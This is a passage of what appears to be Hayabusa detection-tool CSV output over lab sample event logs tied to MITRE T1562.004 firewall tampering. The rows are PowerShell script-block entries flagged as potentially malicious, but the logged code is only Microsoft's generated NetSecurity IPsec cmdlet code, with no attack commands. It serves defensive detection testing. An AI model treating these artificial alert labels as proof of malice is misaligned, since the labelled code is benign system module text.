$myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 